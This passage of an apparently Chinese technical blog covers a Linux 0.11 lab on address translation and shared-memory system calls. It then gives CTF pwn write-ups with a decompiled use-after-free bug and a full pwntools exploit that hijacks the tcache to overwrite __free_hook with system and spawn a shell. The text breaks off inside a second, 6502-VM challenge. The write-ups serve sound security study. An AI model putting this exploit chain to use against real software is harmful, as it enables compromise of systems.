es:0x0017, dh=0x10c0f300, dl=0x00003fff, valid=1
Data segment, base=0x10000000, limit=0x03ffffff, Read/Write, Accessed
cs:0x000f, dh=0x10c0fb00, dl=0x00000002, valid=1
Code segment, base=0x10000000, limit=0x00002fff, Execute/Read, Non-Conforming, Accessed, 32-bit
ss:0x0017, dh=0x10c0f300, dl=0x00003fff, valid=1
Data segment, base=0x10000000, limit=0x03ffffff, Read/Write, Accessed
ds:0x0017, dh=0x10c0f300, dl=0x00003fff, valid=3
Data segment, base=0x10000000, limit=0x03ffffff, Read/Write, Accessed
fs:0x0017, dh=0x10c0f300, dl=0x00003fff, valid=1
Data segment, base=0x10000000, limit=0x03ffffff, Read/Write, Accessed
gs:0x0017, dh=0x10c0f300, dl=0x00003fff, valid=1
Data segment, base=0x10000000, limit=0x03ffffff, Read/Write, Accessed
ldtr:0x0068, dh=0x000082fe, dl=0x92d00068, valid=1
tr:0x0060, dh=0x00008bfe, dl=0x92e80068, valid=1
gdtr:base=0x0000000000005cb8, limit=0x7ff
idtr:base=0x00000000000054b8, limit=0x7ff
  • GDTR 寄存器中的值为 0x5cb8
  • LDTR 寄存器中的值为 0x0068
  • DS 寄存器中的值为 0x0017(0b0000000000010111,索引值为 0b10)

xp 命令可以打印指定内存的数据:

  • 查看 GDT 表信息,LDT 表的物理地址为 0xfe92d0
1
2
3
4
<bochs:5> xp /8w 0x00005cb8+0x68
[bochs]:
0x0000000000005d20 <bogus+ 0>: 0x92d00068 0x000082fe 0xb2e80068 0x000089f8
0x0000000000005d30 <bogus+ 16>: 0xb2d00068 0x000082f8 0x00000000 0x00000000
  • 查看对应 LDT 表信息,DS 段的索引为 0x2,对应 0x00003fff 0x10c0f300
1
2
3
4
<bochs:6> xp /8w 0xfe92d0
[bochs]:
0x0000000000fe92d0 <bogus+ 0>: 0x00000000 0x00000000 0x00000002 0x10c0fb00
0x0000000000fe92e0 <bogus+ 16>: 0x00003fff 0x10c0f300 0x00000000 0x00fea000

段描述符的结构如下:

  • 段基址由3部分组合而成:[0,8),[24,32),[48,64)
1
2
bin(0x00003fff10c0f300) =>
0b[0000000000000000]0011111111111111[00010000]1100000011110011[00000000]
  • 计算得基地址为 0x10000000
  • 因此线性地址为 0x10003004
1
2
In [1]: hex(0b00010000000000000000000000000000)
Out[1]: '0x10000000'

calc 命令验证线性地址是否正确:

1
2
<bochs:7> calc ds:0x3004
0x10003004 268447748

线性地址的结构如下:

1
2
bin(0x10003004) =>
0b[1000000][0000000011][000000000100]
  • 0-11:页内偏移 - 4
  • 12-21:页表索引 - 3
  • 22-31:页目录索引 - 64(二级页表索引)

在 IA-32(英特尔的32位CPU架构) 下,页目录表的位置由 CR3 寄存器指引,用 creg 命令可以看到:

1
2
3
4
5
6
7
8
9
<bochs:2> creg
CR0=0x8000001b: PG cd nw ac wp ne ET TS em MP PE
CR2=page fault laddr=0x0000000010002fb0
CR3=0x000000000000
PCD=page-level cache disable=0
PWT=page-level write-through=0
CR4=0x00000000: cet pke smap smep osxsave pcid fsgsbase smx vmx osxmmexcpt umip osfxsr pce pge mce pae pse de tsd pvi vme
CR8: 0x0
EFER=0x00000000: ffxsr nxe lma lme sce
  • 页目录表所在物理地址为 0x0
  • 页目录表和页表中的内容很简单,是1024个32位数,这32位中前20位是物理页框号,后面是一些属性信息(最重要的是最后一位P)
1
2
3
4
5
<bochs:4> xp /8w 0+64*4
[bochs]:
0x0000000000000100 <bogus+ 0>: 0x00fa6027 0x00000000 0x00000000 0x00000000
0x0000000000000110 <bogus+ 16>: 0x00000000 0x00000000 0x00000000 0x00000000
0x0000000000000120 <bogus+ 32>: 0x00000000 0x00000000 0x00000000 0x00000000
  • 页表所在的物理页框号为 0x00fa6,即页表在物理内存为 0x00fa6000
1
2
3
4
<bochs:5> xp /8w 0x00fa6000 + 3*4
[bochs]:
0x0000000000fa600c <bogus+ 0>: 0x00f99067 0x00000000 0x00000000 0x00000000
0x0000000000fa601c <bogus+ 16>: 0x00000000 0x00000000 0x00000000 0x00000000
  • 物理页所在的物理页框号为 0x00f99,即物理页在物理内存为 0x00f99000
  • 因此变量 i 的物理地址为 0x00f99004

page 命令验证物理地址是否正确:

1
2
3
4
<bochs:6> page 0x10003004
PDE: 0x0000000000fa6027 ps A pcd pwt U W P
PTE: 0x0000000000f99067 g pat D A pcd pwt U W P
linear page 0x0000000010003000 maps to physical page 0x000000f99000

打印该地址的数据即可发现 0x12345678

1
2
3
<bochs:8> xp /w 0x00f99004
[bochs]:
0x0000000000f99004 <bogus+ 0>: 0x12345678

最后使用 setpmem 命令修改内存即可:

1
2
3
4
<bochs:10> setpmem 0x00f99004 4 0
<bochs:11> xp /w 0x00f99004
[bochs]:
0x0000000000f99004 <bogus+ 0>: 0x00000000
  • 程序成功退出

Linux 和 Unix 系统中,共享内存(Shared Memory)是一种在多进程环境下实现进程间通信的技术,它允许多个进程同时访问同一块内存区域,从而实现数据的共享和通信

在为 linux-0.11 编写共享内存代码前,我们需要先分析一下 linux-0.11 对页面的管理机制

1
2
3
#define PAGING_MEMORY (15*1024*1024)
#define PAGING_PAGES (PAGING_MEMORY>>12)
static unsigned char mem_map [ PAGING_PAGES ] = {0,};
  • mem_map 是一个全局数组,在 Linux 0.11 中用于记录各个物理页框的使用情况
  • 其索引是物理页框号,即 (物理地址 - LOW_MEM) >> 12;每个元素是对应物理页框的引用计数,0 表示空闲

在 Linux-0.11 中,物理内存由一系列页框组成,每个页框的大小为 4KB,mem_map 数组记录了每个物理页框的引用计数,当进程需要分配内存时,会从 mem_map 中查找一个计数为 0 的空闲页框,将其标记为已占用,并返回该页框的物理地址

初始化 mem_map 数组的函数为 mem_init,在 swapper 进程中会调用一次:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
#define MAP_NR(addr) (((addr)-LOW_MEM)>>12)
#define USED 100

/*
 * Initialise the page-frame usage map.
 *
 * start_mem: first address of the range that may be handed out.
 * end_mem:   end of that range; also stored in HIGH_MEMORY.
 *
 * Every mem_map entry is first marked USED; the entries covering
 * [start_mem, end_mem) are then reset to 0 (free).
 */
void mem_init(long start_mem, long end_mem)
{
    int idx;
    long remaining;

    HIGH_MEMORY = end_mem;

    idx = 0;
    while (idx < PAGING_PAGES) {
        mem_map[idx] = USED;
        idx++;
    }

    /* number of 4 KiB frames in the usable range */
    remaining = (end_mem - start_mem) >> 12;
    for (idx = MAP_NR(start_mem); remaining > 0; remaining--, idx++)
        mem_map[idx] = 0;
}

空闲页面分配的函数 get_free_page 代码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
#define LOW_MEM 0x100000
/*
 * Find a free page frame, mark it used, zero it, and return its physical
 * address. Returns 0 when no mem_map entry is 0.
 */
unsigned long get_free_page(void)
{
register unsigned long __res asm("ax");

__asm__("std ; repne ; scasb\n\t" /* scan mem_map backwards (std) from its last entry for a byte equal to al (0) */
"jne 1f\n\t" /* no zero entry found: skip to the end, eax is still 0 */
"movb $1,1(%%edi)\n\t" /* edi has stepped one past the match, so 1(%edi) is the free entry: set it to 1 */
"sall $12,%%ecx\n\t" /* remaining count * 4096 ... */
"addl %2,%%ecx\n\t" /* ... + LOW_MEM = physical address of the page */
"movl %%ecx,%%edx\n\t"
"movl $1024,%%ecx\n\t"
"leal 4092(%%edx),%%edi\n\t" /* start at the last dword of the page (direction flag is still set) */
"rep ; stosl\n\t" /* store eax (0) into all 1024 dwords of the page */
"movl %%edx,%%eax\n" /* return value = physical address of the page */
"1:"
:"=a" (__res)
:"0" (0),"i" (LOW_MEM),"c" (PAGING_PAGES), /* eax = 0, %2 = LOW_MEM, ecx = number of entries to scan */
"D" (mem_map+PAGING_PAGES-1) /* edi = last entry of mem_map */
);
return __res;
}
  • repne scasb 从 mem_map 的末尾开始向前逐字节与 al(值为 0)进行比较,直到找到值为 0 的元素(即空闲页框)或者 ecx 计数耗尽
  • 核心操作就是遍历一遍 mem_map,返回合适的空闲页面

释放已分配页面的函数 free_page 代码如下:

1
2
3
4
5
6
7
8
9
10
11
/*
 * Drop one reference to the page frame at physical address addr.
 *
 * Addresses below LOW_MEM are ignored. Addresses at or above HIGH_MEMORY,
 * and frames whose count is already 0, trigger a panic.
 */
void free_page(unsigned long addr)
{
    unsigned long frame;
    unsigned char previous;

    if (addr < LOW_MEM)
        return;
    if (addr >= HIGH_MEMORY)
        panic("trying to free nonexistent page");

    frame = (addr - LOW_MEM) >> 12;

    /* post-decrement semantics: test the old count, store old - 1 */
    previous = mem_map[frame];
    mem_map[frame] = previous - 1;
    if (previous != 0)
        return;

    /* the frame was already free: undo the wrap-around and complain */
    mem_map[frame] = 0;
    panic("trying to free free page");
}
  • 将对应的 mem_map[addr] 引用计数减 1;如果该页框本来就是空闲的(计数为 0),则触发 panic

函数 put_page 用于将线性地址与物理页进行映射,其实现如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
/*
 * Map the physical page `page` at linear address `address`.
 *
 * Returns `page` on success, or 0 when a page table had to be allocated and
 * get_free_page() failed. The two sanity checks only print a message; they
 * do not abort the mapping.
 */
unsigned long put_page(unsigned long page,unsigned long address)
{
unsigned long tmp, *page_table;

/* NOTE !!! This uses the fact that _pg_dir=0 */

if (page < LOW_MEM || page >= HIGH_MEMORY)
printk("Trying to put page %p at %p\n",page,address);
/* the frame is expected to have exactly one reference at this point */
if (mem_map[(page-LOW_MEM)>>12] != 1)
printk("mem_map disagrees with %p at %p\n",page,address);
/* (address >> 22) * 4: byte offset of the page-directory entry, used directly as a pointer */
page_table = (unsigned long *) ((address>>20) & 0xffc);
if ((*page_table)&1)
/* entry present: its upper 20 bits give the page table's address */
page_table = (unsigned long *) (0xfffff000 & *page_table);
else {
/* no page table yet: allocate one and install it with the low three flag bits set */
if (!(tmp=get_free_page()))
return 0;
*page_table = tmp|7;
page_table = (unsigned long *) tmp;
}
/* bits 12..21 of the address select the page-table entry */
page_table[(address>>12) & 0x3ff] = page | 7;
/* no need for invalidate */
return page;
}

本实验要求我们实现共享内存,首先我们需要添加共享内存的系统调用号:(在 /include/unistd.h 中)

1
2
#define __NR_shmget		76
#define __NR_shmat 77
  • 需要注意的是:这里同时需要修改 hdc-0.11.img 中的 hdc/usr/include/unistd.h 文件,如果想在虚拟机中使用 gcc 编译的话,会导入虚拟机 hdc/usr/include/ 中的文件为头文件

接着修改系统调用号的总数:(在 /kernel/system_call.s 中)

1
nr_system_calls = 78

最后添加新的系统调用定义:(在 /include/linux/sys.h 中)

1
2
3
4
extern int sys_shmget();
extern void *sys_shmat();

fn_ptr sys_call_table[] = {......, sys_shmget, sys_shmat};

头文件以及宏定义:(在 /kernel 中新建文件 shm.c)

1
2
3
4
5
6
7
8
#include <asm/segment.h>
#include <linux/kernel.h>
#include <unistd.h>
#include <string.h>
#include <linux/sched.h>

#define SHM_COUNT 20
#define SHM_NAME_SIZE 20

核心结构体 struct_shm_tables

1
2
3
4
5
/*
 * Table of named shared-memory pages, indexed by shmid.
 * A slot whose name starts with '\0' is treated as unused.
 */
struct struct_shm_tables
{
char name[SHM_NAME_SIZE]; /* name of the region; may occupy all SHM_NAME_SIZE bytes without a terminating NUL */
long addr; /* value returned by get_free_page() for this region */
} shm_tables[SHM_COUNT];

基础字符串函数:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
/*
 * Compare two shared-memory names over at most 20 characters.
 *
 * Returns 1 when the names are equal (both end at the same position, or the
 * first 20 characters all match) and 0 at the first difference. Note that
 * this is the opposite of the strcmp() convention.
 */
int strcmp_shm(char* name,char* tmp){
    int pos = 0;

    while (pos < 20) {
        char ch = name[pos];

        if (ch != tmp[pos])
            return 0;
        if (ch == '\0')
            return 1;   /* both strings ended here */
        pos++;
    }
    return 1;
}

/*
 * Copy a shared-memory name from tmp into name, stopping after the
 * terminating NUL or after 20 characters, whichever comes first.
 *
 * Returns the index of the copied NUL, or 20 when no NUL was found within
 * the first 20 characters (in which case name is not NUL-terminated).
 */
int strcpy_shm(char* name,char* tmp){
    int copied = 0;

    while (copied < 20) {
        name[copied] = tmp[copied];
        if (tmp[copied] == '\0')
            break;
        copied++;
    }
    return copied;
}

/*
 * Look up a shared-memory region by name.
 *
 * name: name to search for (compared with strcmp_shm, i.e. over at most
 *       20 characters).
 *
 * Returns the index of the matching shm_tables slot, or -1 when no slot in
 * use carries that name.
 *
 * strcmp_shm() returns 1 on equality, so the match test must not be negated
 * (the previous `!strcmp_shm(...)` returned the first slot that did NOT
 * match). Unused slots (empty name) are skipped so that an empty `name`
 * cannot match a free slot.
 */
int find_shm_location(char *name)
{
    int i;

    for (i = 0; i < SHM_COUNT; i++){
        if (shm_tables[i].name[0] == '\0'){
            continue;
        }
        if (strcmp_shm(name, shm_tables[i].name)){
            return i;
        }
    }
    return -1;
}

系统调用 sys_shmget:获取一片共享内存

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
/*
 * System call: get (or create) the shared-memory page called `name`.
 *
 * name: user-space pointer to the region name; at most SHM_NAME_SIZE
 *       characters are read.
 *
 * Returns the shmid (index into shm_tables) of the existing or newly created
 * region, or -1 when the name is empty, the table is full, or no free page
 * is available.
 *
 * Fixes over the previous version:
 *  - the free-slot test compared a char with the string literal "\0"
 *    (a pointer), which is never true; it now compares with '\0';
 *  - the lookup is done here with strcmp_shm() directly (1 == equal) and
 *    ignores unused slots;
 *  - a failed get_free_page() (returns 0) no longer creates a region.
 */
int sys_shmget(char *name)
{
    int i;
    int free_slot = -1;
    unsigned long page;
    char tmp[SHM_NAME_SIZE];

    /* Copy the name from user space; strcmp_shm/strcpy_shm are bounded by
     * the same length, so a full-length name needs no terminating NUL. */
    for (i = 0; i < SHM_NAME_SIZE; i++){
        tmp[i] = get_fs_byte(name + i);
        if (tmp[i] == '\0')
            break;
    }

    /* An empty name marks an unused slot and cannot name a region. */
    if (tmp[0] == '\0'){
        return -1;
    }

    /* One pass: return an existing region, remember the first free slot. */
    for (i = 0; i < SHM_COUNT; i++){
        if (shm_tables[i].name[0] == '\0'){
            if (free_slot == -1)
                free_slot = i;
        } else if (strcmp_shm(tmp, shm_tables[i].name)){
            return i;
        }
    }

    if (free_slot == -1){
        printk("SHM Number limited!\n");
        return -1;
    }

    page = get_free_page(); /* grab a free page frame; 0 means none left */
    if (!page){
        return -1;
    }

    strcpy_shm(shm_tables[free_slot].name, tmp);
    shm_tables[free_slot].addr = page;
    return free_slot;
}

系统调用 sys_shmat:映射一片共享内存

1
2
3
4
5
6
7
8
9
void *sys_shmat(int shmid)
{
if (shm_tables[shmid].name[0] == "\0"){
printk("SHM not exists!\n");
return -1;
}
put_page(shm_tables[shmid].addr, current->brk + current->start_code); /* 创建页表,建立起虚拟地址到物理地址的映射关系 */
return (void *)current->brk;
}

最后修改 makefile:

1
2
3
4
5
6
OBJS  = sched.o system_call.o traps.o asm.o fork.o \
panic.o printk.o vsprintf.o sys.o exit.o \
signal.o mktime.o sem.o shm.o

sem.s sem.o: sem.c ../include/linux/kernel.h ../include/unistd.h
shm.s shm.o: shm.c ../include/linux/kernel.h ../include/unistd.h

接下来我们需要修改上一个实验的生产者-消费者程序,并用共享内存做缓冲区:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
#define   __LIBRARY__
#include <unistd.h>
#include <sys/types.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>

_syscall2(int,sem_open,const char *,name,unsigned int,value);
_syscall1(int,sem_wait,int,sem);
_syscall1(int,sem_post,int,sem);
_syscall1(int,sem_unlink,const char *,name);

_syscall1(int,shmget,char*,name);
_syscall1(int,shmat,int,shmid);

const int consumerNum = 3;
const int itemNum = 6;
const int bufSize = 10;
int buf_in = 0,buf_out = 0;

/*
 * Producer/consumer demo using three named semaphores and one shared page.
 *
 * One producer child publishes itemNum values through buffer[0]; consumerNum
 * consumer children each take itemNum/consumerNum values. buffer[0] is a
 * single slot, so "empty" starts at 1 and "full" at 0.
 *
 * Fixes over the previous version:
 *  - the "mutex" semaphore is created with value 1 (it was 10, which does
 *    not provide mutual exclusion);
 *  - the results of shmget() and shmat() are checked before use.
 *
 * Returns 0 on success and -1 on any setup failure.
 */
int main()
{
    int sem_empty, sem_full, sem_mutex;
    int *buffer;
    int shmid;
    int stat;
    pid_t p;
    int i,j,k;

    if((sem_empty = sem_open("empty",1)) < 0){
        perror("empty error!\n");
        return -1;
    }

    if((sem_full = sem_open("full",0)) < 0){
        perror("full error!\n");
        return -1;
    }

    if((sem_mutex = sem_open("mutex",1)) < 0){
        perror("mutex error!\n");
        return -1;
    }

    shmid = shmget("buffer");
    if(shmid < 0){
        perror("shmget error!\n");
        return -1;
    }

    /* producer */
    if(!(p = fork())){
        printf("A(%d) create\n",0);
        buffer = (int *)shmat(shmid);
        if((long)buffer == -1){
            perror("shmat error!\n");
            return -1;
        }
        for(i = 0; i < itemNum; i++){
            sem_wait(sem_empty);
            sem_wait(sem_mutex);

            printf("A(%d) >> buf_in:%d\n",0,buf_in);
            buffer[0] = buf_in;
            buf_in = (buf_in+1) % bufSize;

            sem_post(sem_mutex);
            sem_post(sem_full);
        }
        printf("A(%d) done\n",0);
        return 0;
    }
    else if(p < 0){
        perror("fork error!\n");
        return -1;
    }

    /* consumers */
    for(j = 0; j < consumerNum; j++){
        if(!(p = fork())){
            printf("B(%d) create\n",j);
            buffer = (int *)shmat(shmid);
            if((long)buffer == -1){
                perror("shmat error!\n");
                return -1;
            }
            for(k = 0; k < itemNum/consumerNum; k++){
                sem_wait(sem_full);
                sem_wait(sem_mutex);

                buf_out = buffer[0];
                printf("B(%d) >> buf_out:%d\n",j,buf_out);

                buf_out = (buf_out + 1) % bufSize;
                buffer[0] = buf_out;

                sem_post(sem_mutex);
                sem_post(sem_empty);

            }
            printf("B(%d) done\n",j);
            return 0;
        }
        else if(p < 0){
            perror("fork error!\n");
            return -1;
        }
    }

    /* reap every child, then remove the semaphores */
    while ((wait(&stat)) > 0);
    sem_unlink("empty");
    sem_unlink("full");
    sem_unlink("mutex");

    puts("all done");
    return 0;
}

这里有一个点需要注意,由于共享页面同时存在于两个进程中,因此会在 do_exit 中被释放两次

为了不触发内核报错,这里需要修改 free_page 函数:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
/*
 * free_page - drop one reference to the physical page at `addr`.
 *
 * addr: physical address of the page.  Addresses below LOW_MEM are
 *       ignored; addresses at or above HIGH_MEMORY panic.
 *
 * Unlike the stock routine, freeing a page whose count is already zero is
 * silently tolerated: a page handed out by sys_shmget() is mapped into
 * several processes without its count being raised, so it is released once
 * per process on exit.
 */
void free_page(unsigned long addr)
{
	if (addr < LOW_MEM)
		return;
	if (addr >= HIGH_MEMORY)
		panic("trying to free nonexistent page");
	addr -= LOW_MEM;
	addr >>= 12;		/* byte offset -> page-frame index */

	/* Decrement rather than mask off bit 0: masking left any frame with a
	 * count of 2 or more (e.g. pages shared after fork) allocated forever. */
	if (mem_map[addr])
		mem_map[addr]--;
}

最终的效果如下:

atuo_coffee_sale_machine

1
GNU C Library (Ubuntu GLIBC 2.31-0ubuntu9.9) stable release version 2.31.
1
2
3
4
5
6
pwn: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=b65a1033a56d36412b5e4993b0c7f4f4f2e685bf, for GNU/Linux 3.2.0, not stripped
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x400000)
  • 64位,dynamically,Partial RELRO,Canary,NX

漏洞分析

题目维护了两个数组 copy_left_coffee 和 left_coffee,分别存放 user 和 root 状态下的数据

大多数函数在执行之前都会先根据当前状态进行切换,但 change_default 没有:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
// Excerpt (decompiler output) of change_default: overwrite the content of one
// stored coffee entry selected by (id, index).
show_list();
puts("input the id you want to change");
printf(">>>");
read(0, buf, 4uLL);                     // at most 4 bytes of digits
id = atol(buf) - 1;                     // user input is 1-based
if ( id < 3 )
{
puts("input which coffee you want to change");
printf(">>>");
read(0, buf, 4uLL);
index = atol(buf) - 1;
// NOTE(review): the check is an OR, so any index whose slot holds a non-NULL
// pointer is accepted even when index >= 5.
if ( index < 5 || copy_left_coffee[id][index] )
{
puts("input your content");
// Writes up to 0x80 bytes through the pointer stored in copy_left_coffee.
read(0, copy_left_coffee[id][index], 0x80uLL);
puts("done");
update(2);
}
else
{
puts("invalid coffee");
}
}

这意味着在 user 状态下释放 chunk 时,数据不会同步到 root 状态,这就造成了 UAF

入侵思路

程序中只有一个地方可以用来泄露:

1
2
3
4
5
6
7
// Print the three coffee_list entries: name plus remaining count, or
// "SOLD OUT!" when num is zero.  The name is printed with %s, which is what
// the write-up uses as its leak primitive.
for ( i = 0; i <= 2; ++i )
{
if ( coffee_list[i].num )
printf("%d.%s:%d\n", (unsigned int)(i + 1), coffee_list[i].name, (unsigned int)coffee_list[i].num);
else
printf("%d.%s:SOLD OUT!\n", (unsigned int)(i + 1), coffee_list[i].name);
}

劫持 tcachebin 为 coffee_list 就可以泄露 libc_base

最后劫持 tcachebin 为 free_hook,写入 system 即可

完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
# -*- coding:utf-8 -*-
from pwn import *

arch = 64
challenge = './pwn1'

context.os='linux'
#context.log_level = 'debug'
if arch==64:
    context.arch='amd64'
if arch==32:
    context.arch='i386'

elf = ELF(challenge)
libc = ELF('libc-2.31.so')

# Short aliases for the tube methods of the global connection `p`
# (p is assigned further down, before any of these is called).
rl = lambda a=False : p.recvline(a)
ru = lambda a,b=True : p.recvuntil(a,b)
rn = lambda x : p.recvn(x)
sn = lambda x : p.send(x)
sl = lambda x : p.sendline(x)
sa = lambda a,b : p.sendafter(a,b)
sla = lambda a,b : p.sendlineafter(a,b)
irt = lambda : p.interactive()
dbg = lambda text=None : gdb.attach(p, text)
# lg = lambda s,addr : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s,addr))
# Log a variable by name in colour; the escape sequences need the leading "\0".
lg = lambda s : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s, eval(s)))
# Pad a short leak with NUL bytes before unpacking; the fill argument of
# ljust() must be exactly one byte.
uu32 = lambda data : u32(data.ljust(4, b'\x00'))
uu64 = lambda data : u64(data.ljust(8, b'\x00'))

b = "set debug-file-directory ./.debug/\n"

# local = 1 runs the binary as a child process, anything else connects remotely.
local = 1
if local:
    p = process(challenge)
    #p = gdb.debug(challenge, b)
else:
    p = remote('119.13.105.35','10111')

def debug():
    """Attach gdb to `p` with a breakpoint at 0x401CE9, then pause()."""
    gdb.attach(p,"b *0x401CE9\n")
    #gdb.attach(p,"b *$rebase(0x1409)\nb *$rebase(0x137A)\n")
    pause()

def cmd(op):
    """Send menu choice `op` once the '>>>' prompt has been received."""
    sla(">>>",str(op))

def admin():
    """Select menu entry 0x1145 and answer the password prompt."""
    cmd(0x1145)
    sla("password","just pwn it")

def edit(id,index,data):
    """Menu entry 2: answer both 'change' prompts with `id` and `index`, then send `data` as the content."""
    cmd(2)
    sla("change",str(id))
    sla("change",str(index))
    sa("content",data)

def add(id):
    """Menu entry 1, followed by `id` at the next '>>>' prompt."""
    cmd(1)
    sla(">>>",str(id))

def buy(id,data=""):
    """Menu entry 1: buy coffee `id`.

    Answers the Y/N prompt with "N" when `data` is empty; otherwise answers
    "Y" and sends `data` after the 'coffee' prompt.
    """
    cmd(1)
    sla("want to buy",str(id))
    if(data == ""):
        sla("Y/N","N")
    else:
        sla("Y/N","Y")
        sa("coffee",data)

#debug()
# Address used below as the forged tcache target (coffee_list, per the write-up).
coffee_list_addr = 0x4062f0

# NOTE(review): indentation was lost in this listing; each `for` presumably
# owns only the line(s) directly beneath it — confirm against the original.
for i in range(5):
buy(1)

admin()
add(0)
cmd(3)

for i in range(2):
buy(1)

# Overwrite entry (1,7) with coffee_list_addr, then issue three add(1) calls;
# per the write-up this redirects a tcache allocation onto coffee_list.
admin()
edit(1,7,p64(coffee_list_addr))
add(1)
add(1)
add(1)
cmd(3)

# NOTE(review): it is not visible here whether buy(1) belongs to this loop.
for i in range(3):
buy(2)
buy(1)
admin()
edit(1,2,p16(0x7680))
cmd(3)
cmd(2)
ru("================")
ru("1.")

# The first six bytes after "1." are taken as a libc pointer.
leak_addr = u64(p.recv(6).ljust(8,b'\x00'))
libc_base = leak_addr - 0x1ebbe0
success("leak_addr >> "+hex(leak_addr))
success("libc_base >> "+hex(libc_base))

free_hook = libc_base + libc.sym["__free_hook"]
system = libc_base + libc.sym["system"]
success("free_hook >> "+hex(free_hook))
success("system >> "+hex(system))

# Same technique again: aim an allocation at __free_hook and write system there.
admin()
edit(2,3,p64(free_hook))
add(1)
add(1)
edit(1,5,p64(system))
cmd(3)

# Sends "/bin/sh" as the coffee content; presumably that buffer is later
# freed, which would call system("/bin/sh") through the hook.
buy(1,"/bin/sh\x00")

p.interactive()

6502_proccessor

1
GNU C Library (Ubuntu GLIBC 2.27-3ubuntu1.6) stable release version 2.27.
1
2
3
4
5
6
6502_proccessor: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=6c78b755035efbfcec3230038685158aefa0d8cb, not stripped
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
  • 64位,dynamically,Partial RELRO,Canary,NX,PIE

程序分析

本题目实现了一个 6502 CPU 指令集的 VM

6502 CPU 有3个8位寄存器:regA(累加器),regX(X变址寄存器),regY(Y变址寄存器)

题目中所有指令都由全局数组 lookup 进行管理,该数组的每个条目都被用于表示一个指令,其结构如下:

1
2
3
4
5
6
00000000 Node struc ; (sizeof=0x20, mappedto_18)
00000000 name dq ?
00000008 code2 dq ? ; offset
00000010 code1 dq ? ; offset
00000018 flag dq ?
00000020 Node ends

每个指令结构体中都有两个函数,一个表示该指令的操作,另一个表示该指令的寻址方式

要利用的指令操作如下:

1
2
3
4
5
6
7
8
// LDA: copy the fetched operand byte into regA and update flags 1 and 7.
__int64 LDA() /* load (memory -> register) */
{
fetch();
regA = fetched;
set_flag(1u, fetched == 0);                 // flag 1: value is zero
set_flag(7u, (unsigned __int8)regA >> 7);   // flag 7: top bit of regA
return 1LL;
}
1
2
3
4
5
// STA: write regA to the address held in addr_abs (set by the addressing mode).
__int64 STA() /* store (register -> memory) */
{
cpu_write(addr_abs, regA);
return 0LL;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
// ADC: regA = regA + fetched + cpu_extract_sr(0), truncated to 8 bits, with
// flags 0, 1, 6 and 7 updated from the 16-bit intermediate result.
__int64 ADC() /* gives direct control over regA */
{
__int16 v0; // bx
unsigned __int16 v2; // [rsp+Eh] [rbp-12h]

fetch();
v0 = (unsigned __int8)regA + (unsigned __int8)fetched;
v2 = v0 + (unsigned __int8)cpu_extract_sr(0);   // add status bit 0 (presumably the carry)
set_flag(0, v2 > 0xFFu);                        // flag 0: result exceeded 8 bits
set_flag(1u, (unsigned __int8)v2 == 0);         // flag 1: low byte is zero
set_flag(6u, ((unsigned __int8)~(regA ^ fetched) & (unsigned __int8)(regA ^ v2) & 0x80) != 0); // flag 6: operands share a sign that the result lacks
set_flag(7u, (v2 & 0x80) != 0);                 // flag 7: bit 7 of the result
regA = v2;
return 1LL;
}

要利用的寻址操作如下:

1
2
3
4
5
6
7
8
9
10
// IZX: fetch an operand byte v1, then build addr_abs from the two bytes stored
// at (regX + v1) and (regX + v1 + 1), both wrapped to 8 bits, low byte first.
__int64 IZX() /* indirect addressing indexed by regX */
{
char v1; // [rsp+Ah] [rbp-6h]
__int16 v2; // [rsp+Ch] [rbp-4h]

v1 = cpu_fetch(cpu);
v2 = (unsigned __int8)cpu_fetch((unsigned __int8)(regX + v1));                          // low byte of the pointer
addr_abs = ((unsigned __int8)cpu_fetch((unsigned __int8)(regX + v1 + 1)) << 8) | v2;    // high byte << 8 | low byte
return 0LL;
}

漏洞分析

函数 write_mem 有负数溢出漏洞:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
// write_mem: store byte a2 at emulated address a1.
//   a1 <= 0x1FF            -> mem_ptr[a1]
//   0x200 <= a1 <= 0xFFF9  -> mem_ptr[(__int16)(a1 - 512) + 518]
//   a1 >  0xFFF9           -> mem_ptr[a1 - 0xFBFA]
// Always returns 0.
__int64 __fastcall write_mem(unsigned __int16 a1, char a2)
{
if ( a1 > 0xFFu )
{
if ( a1 > 0x1FFu )
{
if ( a1 <= 0xFFF9u )
// The difference is reinterpreted as a signed 16-bit value, so for
// a1 >= 0x8200 it is negative and the index can fall below 0.
mem_ptr[(__int16)(a1 - 512) + 518] = a2;
else
